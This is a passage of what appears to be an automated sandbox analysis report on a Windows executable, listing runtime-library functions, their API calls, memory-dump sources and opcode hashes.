                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 3736152602-0
                                                                                • Opcode ID: 57aedeebd0781e94346fd5e7ccfd068c661309cedef47d3bbacdea8cbf7620e8
                                                                                • Instruction ID: b68c45b142f62e52d3dc39f5124e4b33ef5b18749d00efc463be4a2dd3a846b2
                                                                                • Opcode Fuzzy Hash: 57aedeebd0781e94346fd5e7ccfd068c661309cedef47d3bbacdea8cbf7620e8
                                                                                • Instruction Fuzzy Hash: DFF0A436A00116ABDB389B64CC05FBA77A9FB40754F16482DEC06A3180EE78FE52C6D0
                                                                                Function 00AC8A52 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00AC0590: GetLastError.KERNEL32(?,?,00ABAF9E,00AD65C8,0000000C), ref: 00AC0594
                                                                                  • Part of subcall function 00AC0590: SetLastError.KERNEL32(00000000), ref: 00AC0636
                                                                                • EnumSystemLocalesW.KERNEL32(00AC8D30,00000001,00000000,?,-00000050,?,00AC90D2,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00AC8A9C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                • String ID:
                                                                                • API String ID: 2417226690-0
                                                                                • Opcode ID: 907cc63199ef172dd7f6bc8dbea22cf4ec79d51833c6f3bf37f8fe8447fd3f04
                                                                                • Instruction ID: 76aedb99a14ac16d9bbeea79d1e68db25de6311ba27f11a3150341e9dcc152c5
                                                                                • Opcode Fuzzy Hash: 907cc63199ef172dd7f6bc8dbea22cf4ec79d51833c6f3bf37f8fe8447fd3f04
                                                                                • Instruction Fuzzy Hash: 40F0F6362003046FDB149F399C81F7A7B91FF807A8F07882EF9054BA80DAB59C02CB50
                                                                                Function 00AC0B0F Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00ABCA85: EnterCriticalSection.KERNEL32(?,?,00AC0268,?,00AD68B8,00000008,00AC042C,?,?,?), ref: 00ABCA94
                                                                                • EnumSystemLocalesW.KERNEL32(00AC0B02,00000001,00AD6938,0000000C,00AC0F71,00000000), ref: 00AC0B47
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                • String ID:
                                                                                • API String ID: 1272433827-0
                                                                                • Opcode ID: d296348d6a10ef0cd7485db2287a5685f10502b74e4c894b0f2c78b98f423da5
                                                                                • Instruction ID: aadeedfde7bcce66e0b82963fa06ee773968e48e50363cc7d3dd7618d4cba079
                                                                                • Opcode Fuzzy Hash: d296348d6a10ef0cd7485db2287a5685f10502b74e4c894b0f2c78b98f423da5
                                                                                • Instruction Fuzzy Hash: A3F0F972A40214EFD700EF98E942F9D7BB0FB54765F10861AF811DB2A1EB759900CF50
                                                                                Function 00AC896C Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00AC0590: GetLastError.KERNEL32(?,?,00ABAF9E,00AD65C8,0000000C), ref: 00AC0594
                                                                                  • Part of subcall function 00AC0590: SetLastError.KERNEL32(00000000), ref: 00AC0636
                                                                                • EnumSystemLocalesW.KERNEL32(00AC88C5,00000001,00000000,?,?,00AC9130,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00AC89A3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                • String ID:
                                                                                • API String ID: 2417226690-0
                                                                                • Opcode ID: 9e69beb4de52ce7f20fac9317422dbc7e5e0d2d7d63b638ea0d2a5d2e983ea3f
                                                                                • Instruction ID: 62b8db5b367956481551a3ba5107a8f968421231dd76aec6adb58189f88fbd10
                                                                                • Opcode Fuzzy Hash: 9e69beb4de52ce7f20fac9317422dbc7e5e0d2d7d63b638ea0d2a5d2e983ea3f
                                                                                • Instruction Fuzzy Hash: 85F0203630020597CB04DF39C845F7ABF90FB81750F0B445CEA058B680CAB59842CB90
                                                                                Function 00AC1075 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00ABF825,?,20001004,00000000,00000002,?,?,00ABEE27), ref: 00AC10A9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: 2dcd9e21a8ecb478624048756c49b4563e8b443edb32b7d6a1526096134f67ba
                                                                                • Instruction ID: 255c55e7046ac75ce2d2a32bfe5ff957261ba299ddbc9094d4a03e2d6b2fb917
                                                                                • Opcode Fuzzy Hash: 2dcd9e21a8ecb478624048756c49b4563e8b443edb32b7d6a1526096134f67ba
                                                                                • Instruction Fuzzy Hash: DCE0863164022CBBCF22AF60DD04FAE7F2AEF45750F064515FD0565222DB718D31AAD4
                                                                                Function 00AB66A5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_000066B1,00AB5B4F), ref: 00AB66AA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: e95276635d3c8e54ecccb8ffd82ca578c85d48345cbf68b376399b54437a6213
                                                                                • Instruction ID: e5d6996b54ff99e1e85f90b6811990487f1e58bb8e108483e1568e80c519e9c3
                                                                                • Opcode Fuzzy Hash: e95276635d3c8e54ecccb8ffd82ca578c85d48345cbf68b376399b54437a6213
                                                                                • Instruction Fuzzy Hash:
                                                                                Function 00AC9290 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HeapProcess
                                                                                • String ID:
                                                                                • API String ID: 54951025-0
                                                                                • Opcode ID: b1b4e197233ac6ec6ab37fd372cb8ce61b42e8c405a8de9d0f79deede69e4d3f
                                                                                • Instruction ID: 23879934f11705bc2f80c4214f224b47a092a4c833ea651377368261bd68566b
                                                                                • Opcode Fuzzy Hash: b1b4e197233ac6ec6ab37fd372cb8ce61b42e8c405a8de9d0f79deede69e4d3f
                                                                                • Instruction Fuzzy Hash: 57A011302002008BA380CF32AA08A083BE8AA2828030EC228A000C2220EF3880A0AF02
                                                                                Function 00AC817B Relevance: .3, Instructions: 327COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                • String ID:
                                                                                • API String ID: 3471368781-0
                                                                                • Opcode ID: 54a245ededfc7d1dfc6c5f735747853135f9cef35fb45bd0e51f719da1251296
                                                                                • Instruction ID: dc5057495313fd94668a271fedac481444a0014107c6d3695d95c46bfdb555d1
                                                                                • Opcode Fuzzy Hash: 54a245ededfc7d1dfc6c5f735747853135f9cef35fb45bd0e51f719da1251296
                                                                                • Instruction Fuzzy Hash: 75B1F4355007469BDB389B28CD82FB7B3A9FF44708F55452DE983C6681EE79E981CB10
                                                                                Function 00AC1379 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 23ebd0bd5e6436c6e2895a3075ff04c1db8902bf7fd9e8bc258d8b36fe32f176
                                                                                • Instruction ID: 6299ce6f917bfa1e4fe24487c6d46e9f98c35e98efad70b1fcea5b3459bda314
                                                                                • Opcode Fuzzy Hash: 23ebd0bd5e6436c6e2895a3075ff04c1db8902bf7fd9e8bc258d8b36fe32f176
                                                                                • Instruction Fuzzy Hash: 64E08C32E12268EBCB14DBC8CA44E8AF3ECEB45B04B1204AAB501E3202C270DE00C7D0
                                                                                Function 00ABE380 Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0d87c33899da8d58fa6654e79c7e00a8da3c0027e1c05e394fccb95485ad6873
                                                                                • Instruction ID: 68d8e3a73fdd754f8926444451f32f6c05f46ac2a041cd94da90a1f577b6bbef
                                                                                • Opcode Fuzzy Hash: 0d87c33899da8d58fa6654e79c7e00a8da3c0027e1c05e394fccb95485ad6873
                                                                                • Instruction Fuzzy Hash: A3C08C38100A8086CF29EA1083717F833DEA392792F801E8CC4034FB83C61F9C82E700
                                                                                Function 00AB5943 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00AB5949
                                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00AB5957
                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00AB5968
                                                                                • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00AB5979
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule
                                                                                • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                • API String ID: 667068680-1247241052
                                                                                • Opcode ID: 2cc68ea803b20679ee83a5cc2a858d2c7e57789f8c1c946e0c6827430ea5cb52
                                                                                • Instruction ID: dbba09c4295cc0df3b63f5e441c009982e441d49f1c065cd7b4319d638b0200e
                                                                                • Opcode Fuzzy Hash: 2cc68ea803b20679ee83a5cc2a858d2c7e57789f8c1c946e0c6827430ea5cb52
                                                                                • Instruction Fuzzy Hash: 25E0B632591210EFE700DFB0ED4ED4A3AE5FA5565130A492AF505D2160DFB848418BA0
                                                                                Function 00AB91A8 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • type_info::operator==.LIBVCRUNTIME ref: 00AB92C7
                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 00AB93D5
                                                                                • _UnwindNestedFrames.LIBCMT ref: 00AB9527
                                                                                • CallUnexpected.LIBVCRUNTIME ref: 00AB9542
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 2751267872-393685449
                                                                                • Opcode ID: a4f610c6cee3c55b9f414f41a6d931096845c2a6f27f016afbe41a1e3f1d0fab
                                                                                • Instruction ID: a830998317164e2452afd45c039af4bcbd7ae0311506cd3ad304ec1b38d1c480
                                                                                • Opcode Fuzzy Hash: a4f610c6cee3c55b9f414f41a6d931096845c2a6f27f016afbe41a1e3f1d0fab
                                                                                • Instruction Fuzzy Hash: D6B15371800209AFCF29DFA4CA819EFBBBDBF04310F14415AEA156B217D735DA62CB91
                                                                                Function 00ACBAE3 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(01670550,01670550,?,7FFFFFFF,?,00ACBDB3,01670550,01670550,?,01670550,?,?,?,?,01670550,?), ref: 00ACBB89
                                                                                • __alloca_probe_16.LIBCMT ref: 00ACBC44
                                                                                • __alloca_probe_16.LIBCMT ref: 00ACBCD3
                                                                                • __freea.LIBCMT ref: 00ACBD1E
                                                                                • __freea.LIBCMT ref: 00ACBD24
                                                                                • __freea.LIBCMT ref: 00ACBD5A
                                                                                • __freea.LIBCMT ref: 00ACBD60
                                                                                • __freea.LIBCMT ref: 00ACBD70
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __freea$__alloca_probe_16$Info
                                                                                • String ID:
                                                                                • API String ID: 127012223-0
                                                                                • Opcode ID: 2e68d37f1edef7eee9b0826d2db84c83d655bb4b6fa47692ca77d81ad05cab9b
                                                                                • Instruction ID: 7e432f993ef8cdeb82bb42152988228527f26a427222b1eaee1a1a2ac98bcc3d
                                                                                • Opcode Fuzzy Hash: 2e68d37f1edef7eee9b0826d2db84c83d655bb4b6fa47692ca77d81ad05cab9b
                                                                                • Instruction Fuzzy Hash: A57114329147499BDF229FA48D93FEE77B99F09710F2A005DE806B7285EB769C008771
                                                                                Function 00AB35C8 Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 00AB35CF
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00AB35D9
                                                                                • int.LIBCPMT ref: 00AB35F0
                                                                                  • Part of subcall function 00AB3AC0: std::_Lockit::_Lockit.LIBCPMT ref: 00AB3AD1
                                                                                  • Part of subcall function 00AB3AC0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AB3AEB
                                                                                • ctype.LIBCPMT ref: 00AB3613
                                                                                • std::_Facet_Register.LIBCPMT ref: 00AB362A
                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00AB364A
                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00AB3657
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                • String ID:
                                                                                • API String ID: 2958136301-0
                                                                                • Opcode ID: 9a4c0d709a1a8c295b06922bcf4f3394cd349e87df712b72185b26617d0076ae
                                                                                • Instruction ID: 392cda107e869a7c180f996cce9329452e16ba1ca7f97ab0ec41a575b40449de
                                                                                • Opcode Fuzzy Hash: 9a4c0d709a1a8c295b06922bcf4f3394cd349e87df712b72185b26617d0076ae
                                                                                • Instruction Fuzzy Hash: 84019E36D00115ABCF05EB74DA19AFEBBB9AF94710F290909F9116B393DF319E018B91
                                                                                Function 00AB3533 Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 00AB353A
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00AB3544
                                                                                • int.LIBCPMT ref: 00AB355B
                                                                                  • Part of subcall function 00AB3AC0: std::_Lockit::_Lockit.LIBCPMT ref: 00AB3AD1
                                                                                  • Part of subcall function 00AB3AC0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AB3AEB
                                                                                • codecvt.LIBCPMT ref: 00AB357E
                                                                                • std::_Facet_Register.LIBCPMT ref: 00AB3595
                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00AB35B5
                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00AB35C2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                • String ID:
                                                                                • API String ID: 2133458128-0
                                                                                • Opcode ID: b229d44155ba1ddd58f5f95140ad5cf06420c5e8052a5cb5eb8e02b3ec0d921d
                                                                                • Instruction ID: 6c1e96d03d3afaa14ec832e33d9ec2563e6127f239d06362a1332a986c08a614
                                                                                • Opcode Fuzzy Hash: b229d44155ba1ddd58f5f95140ad5cf06420c5e8052a5cb5eb8e02b3ec0d921d
                                                                                • Instruction Fuzzy Hash: 3C01C032D001198FCF11EB64D905AFEB7B9AF84710F290A09F8126B293DF31DE058790
                                                                                Function 00ACA013 Relevance: 9.3, APIs: 6, Instructions: 298COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 930a334cb0a2797bfb396c088b975cb581a5b5e60278418366e74867d3d53b93
                                                                                • Instruction ID: 41b23d4ffef94742e3f673b531f4db0a5444f70c0abfde5544092663250ba7bf
                                                                                • Opcode Fuzzy Hash: 930a334cb0a2797bfb396c088b975cb581a5b5e60278418366e74867d3d53b93
                                                                                • Instruction Fuzzy Hash: 2EB1D474A0424DAFDB11CF99C840FBDBBB5AF65308F16815DE4046B3A2DB719D41CB62
                                                                                Function 00AB8E3A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
